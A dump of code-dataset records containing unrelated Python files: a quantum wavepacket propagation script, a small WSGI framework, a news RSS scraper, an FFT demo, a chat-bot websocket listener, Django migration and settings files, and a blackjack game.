j]],\n# [v_2d[2][i, j], v_2d[3][i, j]]])\n\n# w, u = scipy.linalg.eigh(v_mat)\n# v = np.diagflat(np.exp(-0.5 * 1j * w / hbar * dt))\n# array_tmp = np.array([psi_grid[0][i, j], psi_grid[1][i, j]])\n# array_tmp = np.dot(u.conj().T, v.dot(u)).dot(array_tmp)\n# psi_grid[0][i, j] = array_tmp[0]\n# psi_grid[1][i, j] = array_tmp[1]\n# #self.x_evolve = self.x_evolve_half * self.x_evolve_half\n# #self.k_evolve = np.exp(-0.5 * 1j * self.hbar / self.m * \\\n# # (self.k * self.k) * dt)\n\n\n@jit\ndef x_evolve_2d(dt, psi, v):\n \"\"\"\n propagate the state in grid basis half time step forward with H = V\n :param dt: float\n time step\n :param v_2d: float array\n the two electronic states potential operator in grid basis\n :param psi_grid: list\n the two-electronic-states vibrational state in grid basis\n :return: psi_grid(update): list\n the two-electronic-states vibrational state in grid basis\n after being half time step forward\n \"\"\"\n\n\n vpsi = np.exp(- 1j * v * dt) * psi\n\n\n return vpsi\n\n\ndef k_evolve_2d(dt, kx, ky, psi):\n \"\"\"\n propagate the state in grid basis a time step forward with H = K\n :param dt: float, time step\n :param kx: float, momentum corresponding to x\n :param ky: float, momentum corresponding to y\n :param psi_grid: list, the two-electronic-states vibrational states in\n grid basis\n :return: psi_grid(update): list, the two-electronic-states vibrational\n states in grid basis\n \"\"\"\n\n psi_k = fft2(psi)\n mx, my = mass\n\n Kx, Ky = np.meshgrid(kx, ky)\n\n kin = np.exp(-1j * (Kx**2/2./mx + Ky**2/2./my) * dt)\n\n psi_k = kin * psi_k\n psi = ifft2(psi_k)\n\n return psi\n\n\ndef dpsi(psi, kx, ky, ndim=2):\n '''\n Momentum operator operates on the wavefunction\n\n Parameters\n ----------\n psi : 2D complex array\n DESCRIPTION.\n ndim : int, default 2\n coordinates dimension\n Returns\n -------\n kpsi : (nx, ny, ndim)\n DESCRIPTION.\n\n '''\n\n # Fourier transform of the wavefunction\n psi_k = fft2(psi)\n\n # momentum operator in the Fourier space\n kxpsi = np.einsum('i, ij -> ij', kx, psi_k)\n kypsi = np.einsum('j, ij -> ij', ky, psi_k)\n\n kpsi = np.zeros((nx, ny, ndim), dtype=complex)\n\n # transform back to coordinate space\n kpsi[:,:,0] = ifft2(kxpsi)\n kpsi[:,:,1] = ifft2(kypsi)\n\n return kpsi\n\ndef dxpsi(psi):\n '''\n Momentum operator operates on the wavefunction\n\n Parameters\n ----------\n psi : 2D complex array\n DESCRIPTION.\n\n Returns\n -------\n kpsi : (nx, ny, ndim)\n DESCRIPTION.\n\n '''\n\n # Fourier transform of the wavefunction\n psi_k = fft2(psi)\n\n # momentum operator in the Fourier space\n kxpsi_k = np.einsum('i, ij -> ij', kx, psi_k)\n\n # transform back to coordinate space\n kxpsi = ifft2(kxpsi_k)\n\n return kxpsi\n\ndef dypsi(psi):\n '''\n Momentum operator operates on the wavefunction\n\n Parameters\n ----------\n psi : 2D complex array\n DESCRIPTION.\n\n Returns\n -------\n kpsi : (nx, ny, ndim)\n DESCRIPTION.\n\n '''\n\n # Fourier transform of the wavefunction\n psi_k = fft2(psi)\n\n # momentum operator in the Fourier space\n kxpsi_k = np.einsum('i, ij -> ij', kx, psi_k)\n\n # transform back to coordinate space\n kxpsi = ifft2(kxpsi_k)\n\n return kxpsi\n\n\ndef adiabatic_2d(x, y, psi0, v, dt, Nt=0, coords='linear', mass=None, G=None):\n \"\"\"\n propagate the adiabatic dynamics at a single surface\n\n :param dt: time step\n :param v: 2d array\n potential matrices in 2D\n :param psi: list\n the initial state\n mass: list of 2 elements\n reduced mass\n\n Nt: int\n the number of the time steps, Nt=0 indicates that no propagation has been done,\n only the initial state and the initial purity would be\n the output\n\n G: 4D array nx, ny, ndim, ndim\n G-matrix\n\n :return: psi_end: list\n the final state\n\n G: 2d array\n G matrix only used for curvilinear coordinates\n \"\"\"\n #f = open('density_matrix.dat', 'w')\n t = 0.0\n dt2 = dt * 0.5\n\n psi = psi0.copy()\n\n nx, ny = psi.shape\n\n dx = x[1] - x[0]\n dy = y[1] - y[0]\n\n kx = 2. * np.pi * fftfreq(nx, dx)\n ky = 2. * np.pi * fftfreq(ny, dy)\n\n if coords == 'linear':\n # Split-operator method for linear coordinates\n\n psi = x_evolve_2d(dt2, psi,v)\n\n for i in range(Nt):\n t += dt\n psi = k_evolve_2d(dt, kx, ky, psi)\n psi = x_evolve_2d(dt, psi, v)\n\n elif coords == 'curvilinear':\n\n # kxpsi = np.einsum('i, ijn -> ijn', kx, psi_k)\n # kypsi = np.einsum('j, ijn -> ijn', ky, psi_k)\n\n # tpsi = np.zeros((nx, ny, nstates), dtype=complex)\n # dxpsi = np.zeros((nx, ny, nstates), dtype=complex)\n # dypsi = np.zeros((nx, ny, nstates), dtype=complex)\n\n # for i in range(nstates):\n\n # dxpsi[:,:,i] = ifft2(kxpsi[:,:,i])\n # dypsi[:,:,i] = ifft2(kypsi[:,:,i])\n\n for k in range(Nt):\n t += dt\n psi = rk4(psi, hpsi, dt, kx, ky, v, G)\n\n #f.write('{} {} {} {} {} \\n'.format(t, *rho))\n #purity[i] = output_tmp[4]\n\n\n\n # t += dt\n #f.close()\n\n return psi\n\ndef KEO(psi, kx, ky, G):\n '''\n compute kinetic energy operator K * psi\n\n Parameters\n ----------\n psi : TYPE\n DESCRIPTION.\n dt : TYPE\n DESCRIPTION.\n\n Returns\n -------\n None.\n\n '''\n# kpsi = dpsi(psi, kx, ky)\n\n # Fourier transform of the wavefunction\n psi_k = fft2(psi)\n\n # momentum operator in the Fourier space\n kxpsi = np.einsum('i, ij -> ij', kx, psi_k)\n kypsi = np.einsum('j, ij -> ij', ky, psi_k)\n\n nx, ny = len(kx), len(ky)\n kpsi = np.zeros((nx, ny, 2), dtype=complex)\n\n # transform back to coordinate space\n kpsi[:,:,0] = ifft2(kxpsi)\n kpsi[:,:,1] = ifft2(kypsi)\n\n# ax.contour(x, y, np.abs(kpsi[:,:,1]))\n\n tmp = np.einsum('ijrs, ijs -> ijr', G, kpsi)\n #G = metric_tensor(x[i], y[j]) # 2 x 2 matrix metric tensor at (x, y)\n\n # Fourier transform of the wavefunction\n phi_x = tmp[:,:,0]\n phi_y = tmp[:,:,1]\n\n phix_k = fft2(phi_x)\n phiy_k = fft2(phi_y)\n\n # momentum operator in the Fourier space\n kxphi = np.einsum('i, ij -> ij', kx, phix_k)\n kyphi = np.einsum('j, ij -> ij', ky, phiy_k)\n\n # transform back to coordinate space\n kxphi = ifft2(kxphi)\n kyphi = ifft2(kyphi)\n\n # psi += -1j * dt * 0.5 * (kxphi + kyphi)\n\n return 0.5 * (kxphi + kyphi)\n\ndef PEO(psi, v):\n \"\"\"\n V |psi>\n :param dt: float\n time step\n :param v_2d: float array\n the two electronic states potential operator in grid basis\n :param psi_grid: list\n the two-electronic-states vibrational state in grid basis\n :return: psi_grid(update): list\n the two-electronic-states vibrational state in grid basis\n after being half time step forward\n \"\"\"\n\n\n vpsi = v * psi\n return vpsi\n\ndef hpsi(psi, kx, ky, v, G):\n\n kpsi = KEO(psi, kx, ky, G)\n vpsi = PEO(psi, v)\n\n return -1j * (kpsi + vpsi)\n\n######################################################################\n# Helper functions for gaussian wave-packets\n\n\ndef gauss_k(k,a,x0,k0):\n \"\"\"\n analytical fourier transform of gauss_x(x), above\n \"\"\"\n return ((a / np.sqrt(np.pi))**0.5\n * np.exp(-0.5 * (a * (k - k0)) ** 2 - 1j * (k - k0) * x0))\n\n@jit\ndef theta(x):\n \"\"\"\n theta function :\n returns 0 if x<=0, and 1 if x>0\n \"\"\"\n x = np.asarray(x)\n y = np.zeros(x.shape)\n y[x > 0] = 1.0\n return y\n\n\ndef square_barrier(x, width, height):\n return height * (theta(x) - theta(x - width))\n\n@jit\ndef density_matrix(psi_grid):\n \"\"\"\n compute electronic purity from the wavefunction\n \"\"\"\n rho00 = np.sum(np.multiply(np.conj(psi_grid[0]), psi_grid[0]))*dx*dy\n rho01 = np.sum(np.multiply(np.conj(psi_grid[0]), psi_grid[1]))*dx*dy\n rho11 = np.sum(np.multiply(np.conj(psi_grid[1]), psi_grid[1]))*dx*dy\n\n purity = rho00**2 + 2*rho01*rho01.conj() + rho11**2\n\n return rho00, rho01, rho01.conj(), rho11, purity\n\n\n\nif __name__ == '__main__':\n\n # specify time steps and duration\n ndim = 2 # 2D problem, DO NOT CHANGE!\n dt = 0.01\n print('time step = {} fs'.format(dt * au2fs))\n\n num_steps = 2000\n\n\n nx = 2 ** 6\n ny = 2 ** 6\n xmin = -8\n xmax = -xmin\n ymin = -8\n ymax = -ymin\n x = np.linspace(xmin, xmax, nx)\n y = np.linspace(ymin, ymax, ny)\n dx = x[1] - x[0]\n dy = y[1] - y[0]\n\n # k-space grid\n kx = 2. * np.pi * fftfreq(nx, dx)\n ky = 2. * np.pi * fftfreq(ny, dy)\n\n X, Y = np.meshgrid(x, y)\n\n fig, ax = plt.subplots()\n v = 0.5 * (X**2 + Y**2)\n\n # for i in range(nx):\n # for j in range(ny):\n # v[i,j] = diabatic(x[i], y[j])[0,0]\n\n #ax.imshow(v)\n\n # specify constants\n mass = [1.0, 1.0] # particle mass\n\n x0, y0, kx0, ky0 = -3, -1, 2.0, 0\n\n #coeff1, phase = np.sqrt(0.5), 0\n\n print('x range = ', x[0], x[-1])\n print('dx = {}'.format(dx))\n print('number of grid points along x = {}'.format(nx))\n print('y range = ', y[0], y[-1])\n print('dy = {}'.format(dy))\n print('number of grid points along y = {}'.format(ny))\n\n sigma = np.identity(2) * 0.5\n\n psi0 = gauss_x_2d(sigma, x0, y0, kx0, ky0)\n\n fig, ax = plt.subplots()\n ax.contour(x, y, np.abs(psi0).T)\n\n #psi = psi0\n\n # propagate\n\n # store the final wavefunction\n #f = open('wft.dat','w')\n #for i in range(N):\n # f.write('{} {} {} \\n'.format(x[i], psi_x[i,0], psi_x[i,1]))\n #f.close()\n\n\n G = np.zeros((nx, ny, ndim, ndim))\n G[:,:,0, 0] = G[:,:,1, 1] = 1.\n\n fig, ax = plt.subplots()\n extent=[xmin, xmax, ymin, ymax]\n\n psi1 = adiabatic_2d(x, y, psi0, v, dt=dt, Nt=num_steps, coords='curvilinear',G=G)\n ax.contour(x,y, np.abs(psi1).T)\n\n fig, ax = plt.subplots()\n\n psi2 = adiabatic_2d(psi0, v, mass=mass, dt=dt, Nt=num_steps)\n ax.contour(x,y, np.abs(psi2).T)\n","sub_path":"lime/wpd.py","file_name":"wpd.py","file_ext":"py","file_size_in_byte":16850,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"299351130","text":"# -*-coding:utf-8 -*-\nimport re\nfrom urllib.parse import parse_qs\nfrom http.cookies import SimpleCookie\n\nfrom jinja2 import Environment, PackageLoader\n\njinja_env = Environment(loader=PackageLoader('www', 'templates'))\n\n\nclass Request:\n def __call__(self, env):\n self.env = env\n self.status = '200 OK'\n self.header = [('Content-type', 'text/html')]\n self.content = ''\n self.file = None\n self._form = None\n\n @property\n def method(self):\n return self.env['REQUEST_METHOD']\n\n @property\n def path(self):\n return self.env['PATH_INFO']\n\n @property\n def referer(self):\n return self.env.get('HTTP_REFERER')\n\n @property\n def form(self):\n if self._form:\n return self._form\n try:\n size = int(self.env.get('CONTENT_LENGTH'))\n except ValueError:\n size = 0\n body = self.env['wsgi.input'].read(size)\n dic = parse_qs(body.decode())\n dic = {k: v[0] for k, v in dic.items() if v}\n self._form = dic\n return dic\n\n def _cookie(self):\n try:\n return SimpleCookie(self.env['HTTP_COOKIE'])\n except KeyError:\n return SimpleCookie()\n\n @property\n def cookie(self):\n return {k: v.value for k, v in self._cookie().items() if v.value}\n\n def set_cookie(self, dic=None, **kwargs):\n cookie = self._cookie()\n if dic:\n cookie.load(dic)\n if kwargs:\n cookie.load(kwargs)\n out = cookie.output(header='', sep=' ')\n for i in out.split():\n self.header.append(('Set-Cookie', i))\n\n\nclass NotFound(Exception):\n def __init__(self, value=''):\n self.value = value\n\n def __str__(self):\n return '

404! Not Found This Page:{}

'.format(self.value)\n\n\nrequest = Request()\n\n\ndef render(html, dic=None, **kwargs):\n template = jinja_env.get_template(html)\n dic and kwargs.update(dic)\n request.content = template.render(**kwargs)\n return request\n\n\ndef redirect(path):\n request.status = '303 See Other'\n request.header.append(('Location', path))\n return request\n\n\nclass Application:\n def __init__(self):\n self.urls = dict()\n self.signed_cookie = dict()\n\n def __call__(self, environ, start_response):\n request(environ)\n try:\n response = self.delegate()\n assert isinstance(response, Request) is True, 'Invalid Response'\n start_response(response.status, response.header)\n if response.file:\n yield response.file\n return\n yield response.content.encode()\n except NotFound as e:\n start_response('404 Not Found', [('Content-type', 'text/plain')])\n yield (str(e)).encode()\n except AssertionError as e:\n print(e)\n\n def delegate(self):\n for pattern, func in self.urls.items():\n m = re.match(pattern, request.path)\n if m:\n groups = m.groups()\n if groups:\n return func(*groups)\n return func()\n raise NotFound(request.path)\n\n def route(self, pattern):\n pattern = '^{}$'.format(pattern)\n\n def decorator(func):\n self.urls[pattern] = func\n return func\n\n return decorator\n","sub_path":"www/wsgi.py","file_name":"wsgi.py","file_ext":"py","file_size_in_byte":3359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"14052526","text":"import feedparser\nfrom urllib import request\nfrom bs4 import BeautifulSoup\nimport sys\n\n\ntarget = open('ntv_corpus.txt', 'a')\nerror = open('ntv_error_log.txt','a')\nntvG = feedparser.parse('http://www.ntv.com.tr/gundem.rss')\nntvT = feedparser.parse('http://www.ntv.com.tr/turkiye.rss')\nntvD = feedparser.parse('http://www.ntv.com.tr/dunya.rss')\n\n\ndef parseNews(link):\n\n try:\n r = request.urlopen(link)\n page = r.read()#.decode('utf8')\n s = BeautifulSoup(page, \"html.parser\")\n\n\n \"\"\"\n existingLabels =''\n source = 'DHA'\n title = s.find_all('h1')[0].text\n subTitle = s.find_all('div', ('class', 'spot'))[0].contents[0].contents[0].text\n body = s.find_all('div', ('class', 'icerikyazi'))[0].text.split('\\n')[1]\n date = s.find_all('div', ('class', 'iceriktarih'))[0].text\n print('' + title)\n print('<subTitle>' + subTitle)\n print('<body>' + body)\n print('<date>' + date)\n print('<source>' + source)\n\n print(\"----------------------------\")\n data = 'title!!!ANT!!!' + title + '!!!ANT!!!' + 'subtitle!!!ANT!!!' + subTitle + '!!!ANT!!!' + 'body!!!ANT!!!' + body + '!!!ANT!!!' + 'existing_labels!!!ANT!!!' + str(\n existingLabels) + '!!!ANT!!!' + 'date!!!ANT!!!' + date + '!!!ANT!!!' + 'source!!!ANT!!!' + source + '\\n'\n\n target.write(data)\n \"\"\"\n except :\n error.write(\"!!! ERROR !!! ---- \" + sys.exc_info()[0] + \" in link: \")\n error.write(link)\n\n\n\n\nfor item in ntvG.entries:\n if 'video' not in item.link and 'galeri' not in item.link:\n print (item.link)\n #parseNews(item.link)","sub_path":"Collectors/NTV_RSS_Parser.py","file_name":"NTV_RSS_Parser.py","file_ext":"py","file_size_in_byte":1656,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"130729682","text":"import numpy as np\nfrom numpy import fft\nfrom random import *\nfrom math import sin, cos, pi\nimport matplotlib.pyplot as plt\n\nn = 6\nw = 1200\nN = 64\nnumber = w/(n - 1)\n\nw_values = [w - n * number for n in range(n)]\nx = np.zeros(N)\n\nfor j in range(n):\n amp = choice([i for i in range(-10, 10) if i != 0])\n fi = randint(-360, 360)\n for i in range(N):\n x[i] += amp * sin(w_values[j] * i + fi)\n\ncoeff = np.zeros(shape=(N//2, N//2))\nfor i in range(N//2):\n for j in range(N//2):\n coeff[i][j] = cos(4*pi/N * i * j) + sin(4*pi/N * i * j)\n\ncoeff_N = np.zeros(N)\nfor i in range(N):\n coeff_N[i] = cos(2*pi/N * i) + sin(2*pi/N * i)\n\nF1 = np.zeros(N//2)\nF2 = np.zeros(N//2)\nF = np.zeros(N)\n\nfor i in range(N//2):\n for j in range(N//2):\n F2[i] += x[2*j] * coeff[i][j]\n F1[i] += x[2*j + 1] * coeff[i][j]\n\n\nfor i in range(N):\n if i < (N//2):\n F[i] += F2[i] + coeff_N[i] * F1[i]\n else:\n F[i] += F2[i - (N//2)] - coeff_N[i] * F1[i - (N//2)]\n\nFl = fft.fft(x)\nnump_graph = plt.plot(Fl)\nplt.ylabel('numpy')\nplt.grid()\nplt.savefig(\"numpy.png\")\n\nplt.ylabel('X')\nxpl = plt.plot(x)\nplt.grid()\nplt.savefig(\"x.png\")\nplt.clf()\nphase = plt.plot(F)\nplt.ylabel('F')\nplt.grid()\nplt.savefig(\"f.png\")","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":1230,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"371327399","text":"import websockets\nimport Bot\nfrom command.Command import Command\nfrom command.CommandManager import CommandManager\nfrom command.impl.PrinterDrumLifecycle import PrinterDrumLifecycle\nfrom config.Config import Config\nimport json\n\n\nclass WebSocket:\n auth_cookie = ''\n uri = 'wss://' + Config.get_host() + '/api/v4/websocket'\n\n def __init__(self):\n self.auth_cookie = 'MMAUTHTOKEN=' + Config.get_access_token() + '; MMUSERID=' + Bot.Bot.get_bot().get_bot_id()\n\n async def listen(self):\n async with websockets.connect(\n uri=self.uri,\n extra_headers=[('Cookie', self.auth_cookie)]) \\\n as websocket:\n while True:\n receive = await websocket.recv()\n dump = json.loads(receive)\n if 'data' in dump:\n if 'post' in dump['data']:\n post_dump = dump['data']['post']\n post_dump = post_dump.strip()\n index = post_dump.index('message')\n message = post_dump[index + len('message') + 2:post_dump.index(',', index)]\n message = message[1:len(message) - 1]\n message = message.strip()\n if Command.is_command(message):\n if ' ' in message:\n command, arg = message.split(' ')\n CommandManager.check_command(command, arg)\n else:\n CommandManager.check_command(message, '')\n","sub_path":"connection/WebSocket.py","file_name":"WebSocket.py","file_ext":"py","file_size_in_byte":1596,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"625491358","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('comms', '0001_initial'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='OnionDevApi',\n fields=[\n ('api_ptr', models.OneToOneField(parent_link=True, auto_created=True, primary_key=True, serialize=False, to='comms.Api')),\n ('schedule_id', models.CharField(help_text=b'A unique integer for identifying a request, provided by OnionDev', max_length=200)),\n ('auth_id', models.IntegerField(help_text=b'A unique integer for identifying message requests provided by OnionDev')),\n ],\n options={\n 'abstract': False,\n },\n bases=('comms.api',),\n ),\n ]\n","sub_path":"mentorship/comms/migrations/0002_oniondevapi.py","file_name":"0002_oniondevapi.py","file_ext":"py","file_size_in_byte":873,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"285070733","text":"import os\nfrom .base import *\n\nPROJECT_DIR = os.path.dirname(__file__)\n\nDEBUG = True\nTEMPLATE_DEBUG = DEBUG\n\nADMINS = (\n ('Admins', 'admins@mi.com'),\n)\n\nMANAGERS = ADMINS\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.postgresql_psycopg2',\n # 'NAME': os.path.join(PROJECT_DIR, 'bd.sqlite'),\n 'NAME': 'pro',\n 'USER': 'menda', # TODO env var\n 'PASSWORD': 'postgres', # TODO env var\n 'HOST': '',\n 'PORT': '',\n }\n}\n\n# Absolute filesystem path to the directory that will hold user-uploaded files.\n# Example: \"/var/www/example.com/media/\"\nMEDIA_ROOT = ''\n\n# URL that handles the media served from MEDIA_ROOT. Make sure to use a\n# trailing slash.\n# Examples: \"http://example.com/media/\", \"http://media.example.com/\"\nMEDIA_URL = ''\n\n# Absolute path to the directory static files should be collected to.\n# Don't put anything in this directory yourself; store your static files\n# in apps' \"static/\" subdirectories and in STATICFILES_DIRS.\n# Example: \"/var/www/example.com/static/\"\nSTATIC_ROOT = ''\n\n# URL prefix for static files.\n# Example: \"http://example.com/static/\", \"http://static.example.com/\"\nSTATIC_URL = '/static/'\n\n# Make this unique, and don't share it with anybody. TODO\nSECRET_KEY = get_env_variable('SECRET_KEY')\n\nINSTALLED_APPS += (\n 'django_nose',\n)\n\nTEST_RUNNER = 'django_nose.NoseTestSuiteRunner'\n\nSOUTH_TESTS_MIGRATE = False\nSKIP_SOUTH_TESTS = True\n\n# A sample logging configuration. The only tangible logging\n# performed by this configuration is to send an email to\n# the site admins on every HTTP 500 error when DEBUG=False.\n# See http://docs.djangoproject.com/en/dev/topics/logging for\n# more details on how to customize your logging configuration.\nLOGGING = {\n 'version': 1,\n 'disable_existing_loggers': False,\n 'filters': {\n 'require_debug_false': {\n '()': 'django.utils.log.RequireDebugFalse'\n }\n },\n 'formatters': {\n 'verbose': {\n 'format': '%(levelname)s %(asctime)s %(module)s %(process)d '\n '%(thread)d %(message)s'\n },\n 'simple': {\n 'format': '%(levelname)s %(message)s'\n },\n },\n 'handlers': {\n 'mail_admins': {\n 'level': 'ERROR',\n 'filters': ['require_debug_false'],\n 'class': 'django.utils.log.AdminEmailHandler'\n },\n 'log_file': {\n 'level': 'DEBUG',\n 'class': 'logging.handlers.RotatingFileHandler',\n 'filename': os.path.join(PROJECT_DIR, 'django.log'),\n 'maxBytes': '16777216', # 16 MB\n 'formatter': 'verbose'\n },\n 'console': {\n 'level': 'DEBUG',\n 'class': 'logging.StreamHandler',\n 'formatter': 'simple'\n },\n },\n 'loggers': {\n 'django.request': {\n 'handlers': ['mail_admins'],\n 'level': 'ERROR',\n 'propagate': True,\n },\n 'app': {\n 'handlers': ['console', 'log_file'],\n 'level': 'DEBUG',\n 'propagate': True,\n }\n }\n}\n\nTHROTTLE_TIME = 5 # time to wait until next page parsed\n","sub_path":"website/website/settings/dev.py","file_name":"dev.py","file_ext":"py","file_size_in_byte":3158,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"392698389","text":"import Shoe\nimport Users\nimport InputControl\n\nclass Player:\n def __init__(self, name):\n self.name = name\n self.sum = 0\n self.isInBeginBJ = False\n self.isWin = False\n self.isLose = False\n self.listOfCards = []\n self.deck = 0\n\nclass Dealer:\n def __init__(self):\n self.sum = 0\n self.isInBegLatBJ = False\n self.listOfCards = []\n self.receipts = 0\n\ndef preparing():\n print(\"Input a number of players!\")\n print(\"count: \", end=\"\")\n countOfPlayers = 0\n while True:\n countOfPlayers = input()\n if (InputControl.IControl(countOfPlayers, 0, True)):\n if (int(countOfPlayers) > Users.countOfUsers()):\n print(\"In the database not enough users!\")\n continue\n elif (int(countOfPlayers) < 1):\n print(\"There is not enough players!\")\n break\n\n listOfPlayers = []\n for i in range (int(countOfPlayers)):\n while True:\n print(\"user #\", i + 1, \": \", end=\"\")\n playerInput = input()\n if (InputControl.IControl(playerInput, 1, True)):\n if (Users.isUserExists(playerInput) == True):\n listOfPlayers.append(Player(playerInput))\n break\n else:\n print(\"User with such name not exists!\")\n\n countOfDecks = -1\n while (countOfDecks == -1):\n print(\"Input count of decks (1 - 8): \", end='')\n countOfDecks = Shoe.SetCountOfDecks()\n\n myShoe = Shoe.MakeShoe(countOfDecks)\n \n gameLoop(listOfPlayers, myShoe, countOfDecks)\n \n return\n\ndef gameLoop(players, shoe, countOfDecks):\n while True:\n for player in players:\n while True:\n print(\"Bet of player\", player.name, \": \", end='')\n playerInput = input()\n if (InputControl.IControl(playerInput, 0, True)):\n if (int(playerInput) <= Users.getBalance(player.name, False)):\n player.bet = int(playerInput)\n break\n elif (int(playerInput) < 0):\n print(\"Bet cannot be equal 0 or less then 0!\")\n else:\n print(\"This user have not enough coins!\")\n\n if (len(shoe) == 0):\n shoe = Shoe.MakeShoe(countOfDecks)\n \n player.listOfCards.append(shoe.pop())\n player.listOfCards.append(shoe.pop())\n \n for q in range(0, 2):\n if (InputControl.IControl(str(player.listOfCards[q]), 1, False) == True):\n if (player.listOfCards[q] == 'A'):\n if (player.sum + 11 > 21):\n player.sum += 1\n else:\n player.sum += 11\n else:\n player.sum += 10\n else:\n player.sum += player.listOfCards[q]\n \n if (player.sum == 21):\n player.isInBeginBJ = True\n \n print()\n\n if (len(shoe) == 0):\n shoe = Shoe.MakeShoe(countOfDecks)\n\n dealer = Dealer()\n dealer.listOfCards.append(shoe.pop())\n if (InputControl.IControl(str(dealer.listOfCards[0]), 1, False) == True):\n if (dealer.listOfCards[0] == 'A'):\n if (dealer.sum + 11 > 21):\n dealer.sum += 1\n else:\n dealer.sum += 11\n else:\n dealer.sum += 10\n else:\n dealer.sum += dealer.listOfCards[0]\n\n if (dealer.sum == 10 or dealer.sum == 11):\n dealer.isInBegLatBJ = True\n\n print(\"First dealer's card:\", dealer.listOfCards[0])\n print(\"Dealer's sum:\", dealer.sum)\n\n ### Игра каждого по очереди\n for player in players:\n print(\"\\n****\", player.name, \"****\")\n print(\"Cards of player\", player.name, \":\", player.listOfCards[0], player.listOfCards[1])\n print(\"Sum of player\", player.name, \":\", player.sum)\n\n continueFlag = False\n if (player.isInBeginBJ == True):\n print(\"You have in begin BJ!!!\")\n if (dealer.isInBegLatBJ == True):\n Print(\"But dealer might have BJ too...\")\n if (dealer.sum == 11):\n print(\"Dealer have 'A', then You can get gain 1:1,\")\n print(\"or wait until the end of the game (get or wait)? : \", end='')\n while True:\n print(player.name,\": \", end = \"\")\n playerInput = input()\n if (InputControl.IControl(playerInput, 1, True)):\n if (playerInput == \"wait\"):\n continueFlag = True\n\n break\n elif (playerInput == \"get\"):\n Users.setBalance(player.name, player.deck)\n player.isWin = True\n continueFlag = True\n\n break\n else:\n print(\"Wrong input a command!\")\n else:\n print(\"Wait until the end of the game!\")\n continueFlag == True\n else:\n Users.setBalance(player.name, int(player.deck * 1.5))\n player.isWin = True\n continueFlag == True\n\n if (continueFlag == True):\n continue\n \n while True:\n while True:\n print(\"Will you take a card? (hit or stop)? : \", end='')\n playerInput = input()\n if (InputControl.IControl(playerInput, 1, True)):\n if (playerInput == \"hit\"):\n if (len(shoe) <= 0):\n shoe = Shoe.MakeShoe(countOfDecks)\n\n player.listOfCards.append(shoe.pop())\n if (InputControl.IControl(str(player.listOfCards[len(player.listOfCards) - 1]), 1, False) == True):\n if (player.listOfCards[len(player.listOfCards) - 1] == 'A'):\n if (player.sum + 11 > 21):\n player.sum += 1\n else:\n player.sum += 11\n else:\n player.sum += 10\n else:\n player.sum += player.listOfCards[len(player.listOfCards) - 1]\n\n print(\"Cards of player\", player.name, \": \", end='')\n for card in player.listOfCards:\n print(card, end=' ')\n print(\"\\nSum of player\", player.name, \":\", player.sum)\n\n if (player.sum > 21):\n print(\"Your sum more then 21, you lose!!!\")\n continueFlag = True\n player.isLose = True\n Users.setBalance(player.name, player.deck * -1)\n elif (player.sum == 21):\n print(\"You have BJ!!!\")\n continueFlag = True\n\n break\n elif (playerInput == \"stop\"):\n continueFlag = True\n\n break\n else:\n print(\"Wrong input a command!\")\n \n if (continueFlag == True):\n break\n\n \n ### Дилер\n print(\"\\n****Dealer****\")\n\n if (len(shoe) == 0):\n shoe = Shoe.MakeShoe(countOfDecks)\n\n while dealer.sum < 17:\n dealer.listOfCards.append(shoe.pop())\n if (InputControl.IControl(str(dealer.listOfCards[len(dealer.listOfCards) - 1]), 1, False) == True):\n if (dealer.listOfCards[len(dealer.listOfCards) - 1] == 'A'):\n if (dealer.sum + 11 > 21):\n dealer.sum += 1\n else:\n dealer.sum += 11\n else:\n dealer.sum += 10\n else:\n dealer.sum += dealer.listOfCards[len(dealer.listOfCards) - 1]\n\n print(\"Cards of dealer: \", end='')\n for card in dealer.listOfCards:\n print(card, end=' ')\n\n print(\"\\nSum of Dealer:\", dealer.sum, '\\n')\n\n ###Итог\n if (dealer.sum > 21):\n if (player.isLose == True):\n print(\"Player\", player.name, \"lose! He lost\", player.deck, \"coins!\")\n if (player.isWin == True):\n if (player.isInBeginBJ == True):\n print(\"Player\", player.name, \"Win! He get\", int(player.deck * 1.5), \"coins!\")\n else:\n print(\"Player\", player.name, \"Win! He get\", player.deck, \"coins!\")\n else:\n print(\"Player\", player.name, \"Win! He get\", player.deck, \"coins!\")\n Users.setBalance(player.name, player.deck)\n\n elif (len(dealer.listOfCards) == 2 and dealer.sum == 21):\n for player in players:\n if (player.sum == 21):\n if (player.isWin == True):\n print(\"Player\", player.name, \"Win! He get\", player.deck, \"coins!\")\n Users.setBalance(player.name, player.deck)\n else:\n print(\"Player\", player.name, \"stayed at his rate!\")\n else:\n print(\"Player\", player.name, \"lose! He lost\", player.deck, \"coins!\")\n Users.setBalance(player.name, player.deck * -1)\n else:\n for player in players:\n if (player.isInBeginBJ == True):\n if (dealer.isInBegLatBJ == True):\n if (player.isWin == False):\n if (player.sum < dealer.sum):\n print(\"Player\", player.name, \"lose! He lost\", player.deck, \"coins!\")\n Users.setBalance(player.name, player.deck * -1)\n elif (player.sum > dealer.sum):\n print(\"Player\", player.name, \"Win! He get\", int(player.deck * 1.5), \"coins!\")\n Users.setBalance(player.name, int(player.deck * 1.5))\n else:\n print(\"Player\", player.name, \"stayed at his rate!\")\n else:\n print(\"Player\", player.name, \"Win! He get\", player.deck, \"coins!\")\n else:\n print(\"Player\", player.name, \"Win! He get\", int(player.deck * 1.5), \"coins!\")\n else:\n if (player.isLose == False):\n if (player.sum < dealer.sum):\n print(\"Player\", player.name, \"lose! He lost\", player.deck, \"coins!\")\n Users.setBalance(player.name, player.deck * -1)\n elif (player.sum > dealer.sum):\n print(\"Player\", player.name, \"Win! He get\", player.deck, 